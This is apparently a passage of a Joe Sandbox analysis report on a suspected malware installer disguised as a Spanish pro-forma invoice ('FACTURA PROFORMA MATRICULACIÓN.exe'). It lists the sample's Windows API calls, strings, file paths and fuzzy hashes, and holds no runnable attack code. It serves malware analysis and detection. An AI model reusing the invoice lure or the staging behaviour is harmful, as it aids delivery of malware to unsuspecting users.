                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,?,00404320), ref: 00404503
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                    • Part of subcall function 004055C6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                    • Part of subcall function 004055C6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                    • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                    • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                    • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                    • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                    • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,707E12DB,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                  • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404B18
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404B24
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                    • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                    • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                    • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                    • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                    • Part of subcall function 004067EF: CharPrevW.USER32(?,?,77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                  • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                    • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                    • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                    • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$Call
                                                  • API String ID: 2624150263-3533344981
                                                  • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                  • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                  • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                  • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                  • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                  • DeleteObject.GDI32(00000000), ref: 00405027
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                    • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,?,00404320), ref: 00404503
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                  • ShowWindow.USER32(?,00000005), ref: 00405189
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405357
                                                  • GlobalFree.KERNEL32(?), ref: 00405367
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004054C3
                                                  • ShowWindow.USER32(?,00000000), ref: 00405511
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                  • ShowWindow.USER32(00000000), ref: 00405523
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                  • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                  • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                  • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040471D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040474E
                                                  • GetSysColor.USER32(?), ref: 0040475F
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                  • lstrlenW.KERNEL32(?), ref: 00404780
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                  • SendMessageW.USER32(00000000), ref: 00404802
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                  • SetCursor.USER32(00000000), ref: 00404881
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                  • SetCursor.USER32(00000000), ref: 0040489D
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 004048CC
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N
                                                  • API String ID: 3103080414-3438112850
                                                  • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                  • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                  • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                  • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,Baboodom111 Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Baboodom111 Setup$F
                                                  • API String ID: 941294808-1763592606
                                                  • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                  • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                  • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                  • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                  • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                    • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                    • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                  • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                  • wsprintfA.USER32 ref: 00406206
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,?,00426DA8,?,?,?,?,?), ref: 00406241
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                  • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                    • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00406035
                                                    • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406057
                                                  Strings
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                  • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                  • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                  • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                  • CharPrevW.USER32(?,?,77943420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                  • "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe", xrefs: 00406833
                                                  • *?|<>/":, xrefs: 00406841
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1882904355
                                                  • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                  • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                  • GetSysColor.USER32(00000000), ref: 00404582
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                  • SetBkMode.GDI32(?,?), ref: 0040459A
                                                  • GetSysColor.USER32(?), ref: 004045AD
                                                  • SetBkColor.GDI32(?,?), ref: 004045BD
                                                  • DeleteObject.GDI32(?), ref: 004045D7
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                  • GetMessagePos.USER32 ref: 00404E9E
                                                  • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FD6
                                                  • MulDiv.KERNEL32(0008D10E,00000064,0008D312), ref: 00403001
                                                  • wsprintfW.USER32 ref: 00403011
                                                  • SetWindowTextW.USER32(?,?), ref: 00403021
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 0040300B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                  • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                  • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                  • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                  APIs
                                                    • Part of subcall function 707E12BB: GlobalAlloc.KERNELBASE(00000040,?,707E12DB,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12C5
                                                  • GlobalFree.KERNEL32(?), ref: 707E2743
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E2778
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: b465f9fee4208f68f5078b72c9442aafbc05dc6cd38b158eed044f395e0a160f
                                                  • Instruction ID: a29f08a3a146a8ed3cc97b93fab06ca0b3f2400b6367e001428f03bf49815ab9
                                                  • Opcode Fuzzy Hash: b465f9fee4208f68f5078b72c9442aafbc05dc6cd38b158eed044f395e0a160f
                                                  • Instruction Fuzzy Hash: 0531EE72206106EFC7268F67CDCAD2E7BBAFB85344720466CF34287620C771AC069B65
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                  • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                  • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                  • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E25C2
                                                    • Part of subcall function 707E12CC: lstrcpynW.KERNEL32(00000000,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12DC
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 707E2548
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 707E2563
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 4216380887-0
                                                  • Opcode ID: 8e29a3471dbbe63a91ce278df25aae878bc71103e929f0311292931773a70e60
                                                  • Instruction ID: 4bdcc042842f9bf44309eca352b1b1bfb9ff8e70b92b23e566c05e4758d57307
                                                  • Opcode Fuzzy Hash: 8e29a3471dbbe63a91ce278df25aae878bc71103e929f0311292931773a70e60
                                                  • Instruction Fuzzy Hash: FF4110B110634AEFD310DF26D986A2E77B8FB44310F2049ADF50687290EB70A952CB71
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                  • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                  • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                  • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E76
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
